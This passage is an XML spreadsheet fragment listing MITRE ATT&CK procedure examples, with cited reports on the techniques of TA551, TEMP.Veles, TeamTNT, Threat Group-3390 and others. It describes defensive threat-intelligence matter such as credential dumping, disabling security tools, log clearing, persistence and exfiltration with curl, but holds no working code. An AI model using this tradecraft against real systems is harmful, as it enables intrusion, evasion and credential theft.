    <t>[TA551](https://attack.mitre.org/groups/G0127) has used a DGA to generate URLs from executed macros.(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used spoofed company emails that were acquired from email clients on previously infected hosts to target other individuals.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has retrieved DLLs and installer binaries for malware execution from C2.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has prompted users to enable macros within spearphishing attachments to install malware.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has masked malware DLLs as dat and jpg files.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used mshta.exe to execute malicious payloads.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used obfuscated variable names in a JavaScript configuration file.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used regsvr32.exe to load malicious DLLs.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used rundll32.exe to load malicious DLLs.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has sent spearphishing attachments with password protected ZIP files.(Citation: Unit 42 Valak July 2020)(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used encoded ASCII text for initial C2 communications.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has hidden encoded data for malware DLLs in a PNG.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used HTTP for C2 communications.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[TA551](https://attack.mitre.org/groups/G0127) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: Unit 42 TA551 Jan 2021)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used a VPN to persist in the victim environment.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) routinely deleted tools, logs, and other files after they were finished with them.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified and added entries within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt; to maintain persistence.(Citation: FireEye TRITON 2019)	
</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.(Citation: FireEye TEMP.Veles 2018)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used [Mimikatz](https://attack.mitre.org/software/S0002) and a custom tool, SecHack, to harvest credentials. (Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has created staging folders in directories that were infrequently used by legitimate users or processes.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.(Citation: FireEye TRITON 2019)
</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used a publicly-available PowerShell-based tool, WMImplant.(Citation: FireEye TEMP.Veles 2018) The group has also used PowerShell to perform [Timestomp](https://attack.mitre.org/techniques/T1070/006)ing.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) utilized RDP throughout an operation.(Citation: FireEye TRITON 2019)	</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used scheduled task XML triggers.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) used timestomping to modify the $STANDARD_INFORMATION attribute on tools.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used compromised VPN accounts.(Citation: FireEye TRITON 2019)	</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) has planted Web shells on Outlook Exchange servers.(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used an IRC bot for C2 communications.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has cleared command history with &lt;code&gt;history -c&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has removed system logs from &lt;code&gt;/var/log/syslog&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has queried the AWS instance metadata service for credentials.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) executed [Hildegard](https://attack.mitre.org/software/S0601) through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has checked for running containers with &lt;code&gt;docker ps&lt;/code&gt; and for specific container names with &lt;code&gt;docker inspect&lt;/code&gt;.(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also searched for Kubernetes pods running in a local network.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured AWS credentials and Docker API credentials.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used a script that decodes a Base64-encoded version of WeaveWorks Scope.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has deployed different types of containers into victim environments to facilitate execution.(Citation: Intezer TeamTNT September 2020)(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has disabled &lt;code&gt;iptables&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has obtained domains to host their payloads.(Citation: Palo Alto Black-T October 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has deployed privileged containers that mount the filesystem of victim machine.(Citation: Intezer TeamTNT September 2020)(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has sent locally staged files with collected credentials to C2 servers using cURL.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.(Citation: Intezer TeamTNT September 2020)(Citation: Cisco Talos Intelligence Group) [TeamTNT](https://attack.mitre.org/groups/G0139) has also targeted exposed kubelets for Kubernetes environments.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used a payload that removes itself after running. [TeamTNT](https://attack.mitre.org/groups/G0139) also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used a script that checks `/proc/*/environ` for environment variables related to AWS.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has the &lt;code&gt;curl&lt;/code&gt; and &lt;code&gt;wget&lt;/code&gt; commands as well as batch scripts to download new tools.(Citation: Intezer TeamTNT September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has modified the permissions on binaries with &lt;code&gt;chattr&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has created local privileged users on victim machines.(Citation: Intezer TeamTNT September 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has aggregated collected credentials in text files before exfiltrating.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has relied on users to download and execute malicious Docker images.(Citation: Lacework TeamTNT May 2021)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has developed custom malware such as [Hildegard](https://attack.mitre.org/software/S0601).(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has disguised their scripts with docker-related file names.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used masscan to search for open Docker API ports and Kubernetes clusters.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Cisco Talos Intelligence Group) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.(Citation: Palo Alto Black-T October 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has encrypted its binaries via AES and encoded files using Base64.(Citation: Trend Micro TeamTNT)(Citation: Aqua TeamTNT August 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for attached VGA devices using lspci.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has executed PowerShell commands in batch scripts.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured SSH keys.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for rival malware and removes it if found.(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has added batch scripts to the startup folder.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has deployed XMRig Docker images to mine cryptocurrency.(Citation: Lacework TeamTNT May 2021)(Citation: Cado Security TeamTNT Worm August 2020) [TeamTNT](https://attack.mitre.org/groups/G0139) has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.(Citation: Trend Micro TeamTNT) (Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used SSH to connect back to victim machines.(Citation: Intezer TeamTNT September 2020) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used SSH to transfer tools and payloads onto victim hosts and execute them.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has added RSA keys in &lt;code&gt;authorized_keys&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has scanned specific lists of target IP addresses.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for security products on infected machines.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used UPX and Ezuri packer to pack its binaries.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for system version, architecture, disk partition, logical volume, and hostname information.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has enumerated the host machine’s IP address.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has run &lt;code&gt;netstat -anp&lt;/code&gt; to search for rival malware connections.(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used `libprocesshider` to modify &lt;code&gt;/etc/ld.so.preload&lt;/code&gt;.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has created system services to execute cryptocurrency mining software.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has established persistence through the creation of a cryptocurrency mining system service using &lt;code&gt;systemctl&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used shell scripts for execution.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has uploaded backdoored Docker images to Docker Hub.(Citation: Lacework TeamTNT May 2021)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software.(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Cisco Talos Intelligence Group) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used a custom user agent HTTP header in shell scripts.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has leveraged iplogger.org to send collected data back to C2.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used batch scripts to download tools and executing cryptocurrency miners.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used malware that adds cryptocurrency miners as a service.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [The White Company](https://attack.mitre.org/groups/G0089) has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has the ability to delete its malware entirely from the target system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has used phishing lure documents that trick users into opening them and infecting their computers.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has obfuscated their payloads through packing.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has sent phishing emails with malicious Microsoft Word attachments to victims.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has checked the current date on the victim system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors mapped network drives using &lt;code&gt;net use&lt;/code&gt;.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors used a victim's endpoint management platform, Altiris, for lateral movement.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors spawned shells on remote systems on a victim network to execute commands.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used RAR to compress, encrypt, and password-protect files prior to exfiltration.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use [at](https://attack.mitre.org/software/S0110) to schedule tasks to run self-extracting RAR archives, which install [HTTPBrowser](https://attack.mitre.org/software/S0070) or [PlugX](https://attack.mitre.org/software/S0013) on other victims on a network.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) ran a command to compile an archive of file types of interest from the victim user's directories.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can use a public UAC bypass method to elevate privileges.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has compromised the Able Desktop installer to gain access to victim's environments.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has performed DLL search order hijacking to execute their payload.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used DLL side-loading, including by using legitimate Kaspersky antivirus variants in which the DLL acts as a stub loader that loads and executes the shell code.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have split RAR files for exfiltration into parts.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>During execution, [Threat Group-3390](https://attack.mitre.org/groups/G0027) malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used appcmd.exe to disable logging on a victim server.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has extensively used strategic web compromises to target victims.(Citation: Dell TG-3390)(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.(Citation: Gallagher 2015)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exfiltrated stolen data to Dropbox.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited CVE-2018-0798 in Equation Editor.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited MS17-010 to move laterally to other systems on the network.(Citation: Unit42 Emissary Panda May 2019)	</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors look for and use VPN profiles during an operation to access the network using external VPN services.(Citation: Dell TG-3390) [Threat Group-3390](https://attack.mitre.org/groups/G0027) has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has deleted existing logs and exfiltrated file archives from a victim.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host .(Citation: Dell TG-3390)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors installed a credential logger on Microsoft Exchange servers. [Threat Group-3390](https://attack.mitre.org/groups/G0027) also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.(Citation: Dell TG-3390)(Citation: Hacker News LuckyMouse June 2018)(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have used [gsecdump](https://attack.mitre.org/software/S0008) to dump credentials. They have also dumped credentials from domain controllers.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have used a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used &lt;code&gt;net user&lt;/code&gt; to conduct internal discovery of systems.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has locally staged encrypted archives for later exfiltration efforts.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has lured victims into opening malicious files containing malware.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool has created new Registry keys under `HKEY_CURRENT_USER\Software\Classes\` and `HKLM\SYSTEM\CurrentControlSet\services`.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use the Hunter tool to conduct network service discovery for vulnerable systems.(Citation: Dell TG-3390)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has detached network shares after exfiltrating files, likely to evade detection.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can encrypt payloads using XOR. [Threat Group-3390](https://attack.mitre.org/groups/G0027) malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) obtained a KeePass database from a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used PowerShell for execution.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can spawn svchost.exe and inject the payload into that process.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can read and decrypt stored Registry values.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can add the binary’s path to the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to add persistence.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has moved staged encrypted archives to Internet-facing servers that had previously been compromised with [China Chopper](https://attack.mitre.org/software/S0020) prior to exfiltration.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used the &lt;code&gt;net view&lt;/code&gt; command.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has packed malware and tools.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used e-mail to deliver malicious attachments to victims.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use [NBTscan](https://attack.mitre.org/software/S0590) to discover vulnerable systems.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used `whoami` to collect system user information.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
